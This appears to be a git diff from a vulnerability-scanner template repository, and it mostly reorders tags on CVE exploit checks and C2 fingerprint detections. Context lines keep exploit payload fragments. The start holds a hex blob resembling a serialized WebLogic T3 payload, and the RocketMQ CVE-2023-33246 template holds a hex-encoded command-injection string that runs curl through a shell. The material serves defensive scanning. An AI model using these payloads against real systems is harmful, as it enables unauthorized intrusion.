start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"
diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml
index 560abff103..fa89c477cb 100644
--- a/network/cves/2017/CVE-2017-3881.yaml
+++ b/network/cves/2017/CVE-2017-3881.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: cisco
product: ios
- tags: cve,cve2017,cisco,rce,network,kev,msf
+ tags: cve2017,network,cve,cisco,rce,kev,msf
tcp:
- host:
- "{{Hostname}}"
diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml
index aad7d9a325..78c76dee0e 100644
--- a/network/cves/2017/CVE-2017-5645.yaml
+++ b/network/cves/2017/CVE-2017-5645.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: apache
product: log4j
- tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast,
+ tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast
variables:
end: "\r\n"
tcp:
diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml
index 3f4bce9eb3..aae27610e1 100644
--- a/network/cves/2018/CVE-2018-2628.yaml
+++ b/network/cves/2018/CVE-2018-2628.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: oracle
product: weblogic_server
- tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
+ tags: network,cve2018,cve,oracle,weblogic,deserialization,kev
tcp:
- host:
- "{{Hostname}}"
diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml
index ab5ab965ce..4182be900d 100644
--- a/network/cves/2018/CVE-2018-2893.yaml
+++ b/network/cves/2018/CVE-2018-2893.yaml
@@ -21,7 +21,7 @@ info:
epss-score: 0.97346
metadata:
max-request: 2
- tags: cve,cve2018,weblogic,network,deserialization,rce,oracle
+ tags: network,cve2018,cve,weblogic,deserialization,rce,oracle
tcp:
- inputs:
- data: "t3 12.2.1
diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml
index 26442bcb45..2c55b82dff 100644
--- a/network/cves/2020/CVE-2020-1938.yaml
+++ b/network/cves/2020/CVE-2020-1938.yaml
@@ -26,7 +26,7 @@ info:
vendor: apache
product: geode
shodan-query: title:"Apache Tomcat"
- tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp
+ tags: cve,cve2020,network,kev,tenable,apache,lfi,tomcat,ajp
tcp:
- host:
diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml
index cd06d89738..fa57eef2da 100644
--- a/network/cves/2020/CVE-2020-7247.yaml
+++ b/network/cves/2020/CVE-2020-7247.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: openbsd
product: opensmtpd
- tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev
+ tags: network,cve,cve2020,smtp,opensmtpd,rce,oast,kev,openbsd
tcp:
- host:
- "{{Hostname}}"
diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml
index 9bbf092688..8e81240a01 100644
--- a/network/cves/2022/CVE-2022-24706.yaml
+++ b/network/cves/2022/CVE-2022-24706.yaml
@@ -29,7 +29,7 @@ info:
vendor: apache
product: couchdb
shodan-query: product:"CouchDB"
- tags: cve,cve2022,network,couch,rce,kev,couchdb
+ tags: cve2022,network,cve,couch,rce,kev,couchdb,apache
variables:
name_msg: "00156e00050007499c4141414141414041414141414141"
diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml
index ff5136b516..0014baced3 100644
--- a/network/cves/2022/CVE-2022-31793.yaml
+++ b/network/cves/2022/CVE-2022-31793.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: inglorion
product: muhttpd
- tags: cve,cve2022,network,muhttpd,lfi,unauth
+ tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion
tcp:
- host:
- "{{Hostname}}"
diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml
index e62f0c2961..71f6a1dffb 100644
--- a/network/cves/2023/CVE-2023-33246.yaml
+++ b/network/cves/2023/CVE-2023-33246.yaml
@@ -29,7 +29,7 @@ info:
shodan-query: title:"RocketMQ"
vendor: apache
verified: true
- tags: cve,cve2023,rocketmq,rce,oast,intrusive,network
+ tags: network,cve2023,cve,rocketmq,rce,oast,intrusive,apache
variables:
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
part_b: '{{ hex_decode("3b0a") }}'
diff --git a/network/detection/ws_ftp-ssh-detect.yaml b/network/detection/ws_ftp-ssh-detect.yaml
index 33c33cf50f..a672dc1618 100644
--- a/network/detection/ws_ftp-ssh-detect.yaml
+++ b/network/detection/ws_ftp-ssh-detect.yaml
@@ -16,7 +16,7 @@ info:
vendor: progress
product: ws_ftp
shodan-query: "WS_FTP port:22"
- tags: network,ssh,ws_ftp,detect
+ tags: network,ssh,ws_ftp,detect,progress
tcp:
- host:
diff --git a/network/jarm/c2/cobalt-strike-c2-jarm.yaml b/network/jarm/c2/cobalt-strike-c2-jarm.yaml
index 17b92f2e72..0e67fb3e08 100644
--- a/network/jarm/c2/cobalt-strike-c2-jarm.yaml
+++ b/network/jarm/c2/cobalt-strike-c2-jarm.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 1
shodan-query: ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1+port:443
- tags: jarm,c2,ir,osint,cti,cobalt-strike
+ tags: jarm,network,c2,ir,osint,cti,cobalt-strike
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/covenant-c2-jarm.yaml b/network/jarm/c2/covenant-c2-jarm.yaml
index 56fba2778c..13cc52f89c 100644
--- a/network/jarm/c2/covenant-c2-jarm.yaml
+++ b/network/jarm/c2/covenant-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://twitter.com/MichalKoczwara/status/1548685058403360770
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,covenant
+ tags: jarm,network,c2,ir,osint,cti,covenant
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/evilginx2-jarm.yaml b/network/jarm/c2/evilginx2-jarm.yaml
index fcbd10c537..6974e658a0 100644
--- a/network/jarm/c2/evilginx2-jarm.yaml
+++ b/network/jarm/c2/evilginx2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://github.com/kgretzky/evilginx2
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,evilginx2,phishing
+ tags: jarm,network,c2,ir,osint,cti,evilginx2,phishing
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/grat2-c2-jarm.yaml b/network/jarm/c2/grat2-c2-jarm.yaml
index a34ec91e06..9bd4110648 100644
--- a/network/jarm/c2/grat2-c2-jarm.yaml
+++ b/network/jarm/c2/grat2-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://github.com/r3nhat/GRAT2
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,shad0w
+ tags: c2,jarm,network,ir,osint,cti,shad0w
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/mac-c2-jarm.yaml b/network/jarm/c2/mac-c2-jarm.yaml
index ec0d79f415..445881b9d0 100644
--- a/network/jarm/c2/mac-c2-jarm.yaml
+++ b/network/jarm/c2/mac-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://github.com/cedowens/MacC2
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,macc2
+ tags: jarm,network,c2,ir,osint,cti,macc2
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/macshell-c2-jarm.yaml b/network/jarm/c2/macshell-c2-jarm.yaml
index 04a0df3c28..fa5cde1458 100644
--- a/network/jarm/c2/macshell-c2-jarm.yaml
+++ b/network/jarm/c2/macshell-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://github.com/cedowens/MacShellSwift
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,macshell
+ tags: jarm,network,c2,ir,osint,cti,macshell
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/merlin-c2-jarm.yaml b/network/jarm/c2/merlin-c2-jarm.yaml
index 3fcfe4c068..d9bf6dee2d 100644
--- a/network/jarm/c2/merlin-c2-jarm.yaml
+++ b/network/jarm/c2/merlin-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://merlin-c2.readthedocs.io/en/latest/
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,merlin
+ tags: jarm,network,c2,ir,osint,cti,merlin
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/metasploit-c2-jarm.yaml b/network/jarm/c2/metasploit-c2-jarm.yaml
index 9485c43454..a0bce4771c 100644
--- a/network/jarm/c2/metasploit-c2-jarm.yaml
+++ b/network/jarm/c2/metasploit-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,metasploit
+ tags: jarm,network,c2,ir,osint,cti,metasploit
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/mythic-c2-jarm.yaml b/network/jarm/c2/mythic-c2-jarm.yaml
index e232b95a36..cf882b1f46 100644
--- a/network/jarm/c2/mythic-c2-jarm.yaml
+++ b/network/jarm/c2/mythic-c2-jarm.yaml
@@ -12,7 +12,7 @@ info:
- https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,mythic
+ tags: jarm,network,c2,ir,osint,cti,mythic
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/posh-c2-jarm.yaml b/network/jarm/c2/posh-c2-jarm.yaml
index de528cb388..31def104ef 100644
--- a/network/jarm/c2/posh-c2-jarm.yaml
+++ b/network/jarm/c2/posh-c2-jarm.yaml
@@ -12,7 +12,7 @@ info:
- https://poshc2.readthedocs.io/en/latest/
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,posh
+ tags: jarm,network,c2,ir,osint,cti,posh
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/shad0w-c2-jarm.yaml b/network/jarm/c2/shad0w-c2-jarm.yaml
index ef211e6ad0..10735843a3 100644
--- a/network/jarm/c2/shad0w-c2-jarm.yaml
+++ b/network/jarm/c2/shad0w-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://github.com/bats3c/shad0w
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,shad0w
+ tags: jarm,network,c2,ir,osint,cti,shad0w
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/silenttrinity-c2-jarm.yaml b/network/jarm/c2/silenttrinity-c2-jarm.yaml
index 76ef796975..2142d6a012 100644
--- a/network/jarm/c2/silenttrinity-c2-jarm.yaml
+++ b/network/jarm/c2/silenttrinity-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://github.com/byt3bl33d3r/SILENTTRINITY
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,silenttrinity
+ tags: jarm,network,c2,ir,osint,cti,silenttrinity
tcp:
- inputs:
- data: 2E
diff --git a/network/jarm/c2/sliver-c2-jarm.yaml b/network/jarm/c2/sliver-c2-jarm.yaml
index c9e60bc00b..ad8e00a34f 100644
--- a/network/jarm/c2/sliver-c2-jarm.yaml
+++ b/network/jarm/c2/sliver-c2-jarm.yaml
@@ -11,7 +11,7 @@ info:
- https://github.com/BishopFox/sliver
metadata:
max-request: 1
- tags: jarm,c2,ir,osint,cti,sliver
+ tags: jarm,network,c2,ir,osint,cti,sliver
tcp:
- inputs:
- data: 2E
diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml
index b32ad6c6ad..686933cd1f 100644
--- a/network/misconfig/erlang-daemon.yaml
+++ b/network/misconfig/erlang-daemon.yaml
@@ -13,7 +13,7 @@ info:
metadata:
verified: "true"
shodan-query: product:"Erlang Port Mapper Daemon"
- tags: demon,enum,erlang,epmd
+ tags: network,misconfig,demon,enum,erlang,epmd
network:
- inputs:
diff --git a/ssl/c2/asyncrat-c2.yaml b/ssl/c2/asyncrat-c2.yaml
index f4f69d6da7..279c9438da 100644
--- a/ssl/c2/asyncrat-c2.yaml
+++ b/ssl/c2/asyncrat-c2.yaml
@@ -13,7 +13,7 @@ info:
max-request: 1
shodan-query: ssl:"AsyncRAT Server"
censys-query: services.tls.certificates.leaf_data.issuer.common_name:AsyncRat
- tags: c2,ir,osint,malware,ssl,asyncrat
+ tags: c2,ssl,tls,ir,osint,malware,asyncrat
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/bitrat-c2.yaml b/ssl/c2/bitrat-c2.yaml
index 99d1e31b67..dff181170e 100644
--- a/ssl/c2/bitrat-c2.yaml
+++ b/ssl/c2/bitrat-c2.yaml
@@ -12,7 +12,7 @@ info:
verified: "true"
max-request: 1
censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "BitRAT"'
- tags: c2,ir,osint,malware,ssl,bitrat
+ tags: ssl,tls,c2,ir,osint,malware,bitrat
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/cobalt-strike-c2.yaml b/ssl/c2/cobalt-strike-c2.yaml
index ed9eb883e9..db0c3058a1 100644
--- a/ssl/c2/cobalt-strike-c2.yaml
+++ b/ssl/c2/cobalt-strike-c2.yaml
@@ -12,7 +12,7 @@ info:
verified: "true"
max-request: 1
shodan-query: ssl.cert.serial:146473198
- tags: c2,ir,osint,malware,ssl,panel,cobalt-strike
+ tags: c2,ssl,tls,ir,osint,malware,panel,cobalt-strike
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/covenant-c2-ssl.yaml b/ssl/c2/covenant-c2-ssl.yaml
index ee4e084614..ae4ea7abb6 100644
--- a/ssl/c2/covenant-c2-ssl.yaml
+++ b/ssl/c2/covenant-c2-ssl.yaml
@@ -12,7 +12,7 @@ info:
verified: "true"
max-request: 1
shodan-query: ssl:”Covenant” http.component:”Blazor”
- tags: c2,ir,osint,malware,ssl,covenant
+ tags: ssl,tls,c2,ir,osint,malware,covenant
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/dcrat-server-c2.yaml b/ssl/c2/dcrat-server-c2.yaml
index 00b270de48..aa0e3a912e 100644
--- a/ssl/c2/dcrat-server-c2.yaml
+++ b/ssl/c2/dcrat-server-c2.yaml
@@ -12,7 +12,7 @@ info:
verified: "true"
max-request: 1
censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "DcRat Server"'
- tags: c2,ir,osint,malware,ssl,dcrat
+ tags: c2,ssl,tls,ir,osint,malware,dcrat
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/gozi-malware-c2.yaml b/ssl/c2/gozi-malware-c2.yaml
index 6a1128857d..517dfd685c 100644
--- a/ssl/c2/gozi-malware-c2.yaml
+++ b/ssl/c2/gozi-malware-c2.yaml
@@ -12,7 +12,7 @@ info:
verified: "true"
max-request: 1
censys-query: 'services.tls.certificates.leaf_data.issuer_dn: "C=XX, ST=1, L=1, O=1, OU=1, CN=\*"'
- tags: c2,ir,osint,malware,ssl,gozi
+ tags: ssl,tls,c2,ir,osint,malware,gozi
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/havoc-c2.yaml b/ssl/c2/havoc-c2.yaml
index 384ea4386b..5b67d7e3af 100644
--- a/ssl/c2/havoc-c2.yaml
+++ b/ssl/c2/havoc-c2.yaml
@@ -13,7 +13,7 @@ info:
verified: "true"
max-request: 1
shodan-query: 'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e'
- tags: c2,ir,osint,malware,ssl,havoc
+ tags: c2,ssl,tls,ir,osint,malware,havoc
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/icedid.yaml b/ssl/c2/icedid.yaml
index 5a2aa2c659..ef95089362 100644
--- a/ssl/c2/icedid.yaml
+++ b/ssl/c2/icedid.yaml
@@ -10,7 +10,7 @@ info:
verified: "true"
max-request: 1
censys-query: CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd
- tags: c2,ir,osint,malware,ssl,bokbot,icedid
+ tags: c2,ssl,tls,ir,osint,malware,bokbot,icedid
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/metasploit-c2.yaml b/ssl/c2/metasploit-c2.yaml
index 84ac1cd8a4..d3572b1a57 100644
--- a/ssl/c2/metasploit-c2.yaml
+++ b/ssl/c2/metasploit-c2.yaml
@@ -12,7 +12,7 @@ info:
verified: "true"
max-request: 1
shodan-query: ssl:"MetasploitSelfSignedCA"
- tags: c2,ir,osint,malware,ssl,metasploit
+ tags: c2,ssl,tls,ir,osint,malware,metasploit
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/mythic-c2-ssl.yaml b/ssl/c2/mythic-c2-ssl.yaml
index cc00f613b4..9170d899ec 100644
--- a/ssl/c2/mythic-c2-ssl.yaml
+++ b/ssl/c2/mythic-c2-ssl.yaml
@@ -14,7 +14,7 @@ info:
max-request: 1
shodan-query: ssl:"Mythic"
censys-query: services.tls.certificates.leaf_data.issuer.common_name:Mythic
- tags: c2,ir,osint,malware,ssl,mythic
+ tags: c2,ssl,tls,ir,osint,malware,mythic
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/orcus-rat-c2.yaml b/ssl/c2/orcus-rat-c2.yaml
index 0e3f59a8e1..3a39bbf9a2 100644
--- a/ssl/c2/orcus-rat-c2.yaml
+++ b/ssl/c2/orcus-rat-c2.yaml
@@ -12,7 +12,7 @@ info:
verified: "true"
max-request: 1
censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Orcus Server", "OrcusServerCertificate"}'
- tags: c2,ir,osint,malware,ssl,orcusrat
+ tags: c2,ssl,tls,ir,osint,malware,orcusrat
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/posh-c2.yaml b/ssl/c2/posh-c2.yaml
index 0059135a6b..fc3a45ae0a 100644
--- a/ssl/c2/posh-c2.yaml
+++ b/ssl/c2/posh-c2.yaml
@@ -13,7 +13,7 @@ info:
verified: "true"
max-request: 1
shodan-query: ssl:"P18055077"
- tags: c2,ir,osint,malware,ssl,posh
+ tags: c2,ssl,tls,ir,osint,malware,posh
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/quasar-rat-c2.yaml b/ssl/c2/quasar-rat-c2.yaml
index bb66912c78..d0ee75f19a 100644
--- a/ssl/c2/quasar-rat-c2.yaml
+++ b/ssl/c2/quasar-rat-c2.yaml
@@ -13,7 +13,7 @@ info:
max-request: 1
shodan-query: ssl.cert.subject.cn:"Quasar Server CA"
censys-query: 'services.tls.certificates.leaf_data.subject.common_name: {"Quasar Server CA"}'
- tags: c2,ir,osint,malware,ssl,quasar
+ tags: c2,ssl,tls,ir,osint,malware,quasar
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/c2/shadowpad-c2.yaml b/ssl/c2/shadowpad-c2.yaml
index 6179af7257..fc588e28dd 100644
--- a/ssl/c2/shadowpad-c2.yaml
+++ b/ssl/c2/shadowpad-c2.yaml
@@ -10,7 +10,7 @@ info:
verified: "true"
max-request: 1
censys-query: services.tls.certificates.leaf_data.subject_dn="C=CN, ST=myprovince, L=mycity, O=myorganization, OU=mygroup, CN=myServer"
- tags: c2,ir,osint,malware,ssl,shadowpad
+ tags: ssl,tls,c2,ir,osint,malware,shadowpad
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/kubernetes-fake-certificate.yaml b/ssl/kubernetes-fake-certificate.yaml
index 67a53a0239..ba1852d8d3 100644
--- a/ssl/kubernetes-fake-certificate.yaml
+++ b/ssl/kubernetes-fake-certificate.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 1
shodan-query: ssl:"Kubernetes Ingress Controller Fake Certificate"
- tags: ssl,kubernetes,tls,self-signed
+ tags: ssl,tls,kubernetes,self-signed
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/mismatched-ssl-certificate.yaml b/ssl/mismatched-ssl-certificate.yaml
index 0dce473aca..ee57b6be51 100644
--- a/ssl/mismatched-ssl-certificate.yaml
+++ b/ssl/mismatched-ssl-certificate.yaml
@@ -10,7 +10,7 @@ info:
- https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/ssl-certificate-name-hostname-mismatch/
metadata:
max-request: 1
- tags: ssl,mismatched,tls
+ tags: ssl,tls,mismatched
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/revoked-ssl-certificate.yaml b/ssl/revoked-ssl-certificate.yaml
index 850aa10a4e..fa18112b74 100644
--- a/ssl/revoked-ssl-certificate.yaml
+++ b/ssl/revoked-ssl-certificate.yaml
@@ -11,7 +11,7 @@ info:
- https://www.tenable.com/plugins/nnm/5837
metadata:
max-request: 1
- tags: ssl,revoked,tls
+ tags: ssl,tls,revoked
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/untrusted-root-certificate.yaml b/ssl/untrusted-root-certificate.yaml
index db88d747d4..91ab7ecc5a 100644
--- a/ssl/untrusted-root-certificate.yaml
+++ b/ssl/untrusted-root-certificate.yaml
@@ -12,7 +12,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: ssl,untrusted,tls
+ tags: ssl,tls,untrusted
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
diff --git a/ssl/wildcard-tls.yaml b/ssl/wildcard-tls.yaml
index c63467714d..c3b9c7acff 100644
--- a/ssl/wildcard-tls.yaml
+++ b/ssl/wildcard-tls.yaml
@@ -10,7 +10,7 @@ info:
- https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#carefully-consider-the-use-of-wildcard-certificates
metadata:
max-request: 1
- tags: ssl,wildcard,tls
+ tags: ssl,tls,wildcard
ssl:
- address: "{{Host}}:{{Port}}"
matchers: